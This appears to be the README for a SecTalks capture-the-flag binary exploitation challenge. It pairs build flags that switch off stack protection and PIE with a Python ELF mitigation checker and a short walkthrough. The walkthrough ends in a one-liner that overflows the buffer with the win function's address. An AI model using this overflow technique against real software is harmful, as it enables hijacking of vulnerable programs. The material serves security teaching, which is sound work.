Jack the ROPper (Jack - @omnifocal1)
- Binary has a function that never gets called (which prints flag)
- Reverse and see:
  - Input with bad bounds checking
  - Address of a function that will perform a desired action (printing the flag)
- Overflow saved return address with address of flag-printing function
- Win!
- Build on kali-rolling (32-bit, with stack protector, PIC and PIE disabled):
apt install libc6-dev-i386
gcc -m32 -fno-stack-protector -fno-PIC -no-pie -o jtr jtr.c
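To see why the overwrite below works, here is an added example (not part of this repo) that reads a compiled binary's ELF headers and reports which mitigations the build line above turns off: no PIE (so win sits at a fixed address), no stack canary (so the saved return address is unguarded), plus the stack's NX bit. It assumes a 32-bit little-endian ELF, i.e. the -m32 build; the in-memory sample images it builds are constructed for self-testing only.

```python
import struct
import sys

ET_EXEC, ET_DYN = 2, 3          # e_type: fixed-address executable vs. PIE
PT_GNU_STACK = 0x6474E551       # program header carrying the stack's permission bits
PF_X = 0x1

def parse_elf32(data: bytes) -> dict:
    """Report PIE / NX / stack-canary status for a little-endian ELF32 image."""
    if data[:4] != b"\x7fELF" or data[4] != 1:        # EI_CLASS 1 = 32-bit
        raise ValueError("not a 32-bit ELF file")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<I", data, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    exec_stack = None                                  # None: no PT_GNU_STACK header at all
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", data, off)
        (p_flags,) = struct.unpack_from("<I", data, off + 24)
        if p_type == PT_GNU_STACK:
            exec_stack = bool(p_flags & PF_X)
    return {
        "pie": e_type == ET_DYN,                       # -no-pie gives ET_EXEC: win() at a fixed address
        "nx": exec_stack is False,                     # stack explicitly marked non-executable
        # Heuristic: protector code calls __stack_chk_fail, so the name only appears when
        # -fstack-protector was in effect; -fno-stack-protector leaves it out entirely.
        "canary": b"__stack_chk_fail" in data,
    }

def build_sample(e_type: int, stack_flags: int) -> bytes:
    """Constructed minimal ELF32 image (header + one PT_GNU_STACK phdr); not a real binary."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # 32-bit, little-endian
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0x8048000,
                               52, 0, 0, 52, 32, 1, 40, 0, 0)
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr

def missing_mitigations(status: dict) -> list:
    """Names of the defences a hardened build would have that this image lacks."""
    return [name for name in ("pie", "nx", "canary") if not status[name]]

if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "jtr"
    with open(path, "rb") as f:
        status = parse_elf32(f.read())
    print(path, status, "missing:", missing_mitigations(status) or "none")
```

Run it against the jtr binary built above and then against a build without the -fno-stack-protector and -no-pie flags to compare the two reports.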
- Read the SecTalks slides:
jtr.key
- Read the challenge walkthrough:
  - Detailed: jtr_walkthrough.md
  - Short: jtr_walkthrough_short.md
- Note that if using radare2 you should install from git:
- Or do it the quick way:
- Find the starting address of the win function
objdump -t jtr | grep win
- Copy the address in the first column and reverse the byte order (x86 is little-endian), e.g.:
0804849b g F .text 00000019 win
- Becomes:
9b840408
- Build command line to overflow buffer and blast the win address all over the stack :P
python -c 'print("\x9b\x84\x04\x08" * 100)'
- Run it!:
python -c 'print("\x9b\x84\x04\x08" * 100)' | ./jtr
Materials, notes, and talks about binary exploitation & RE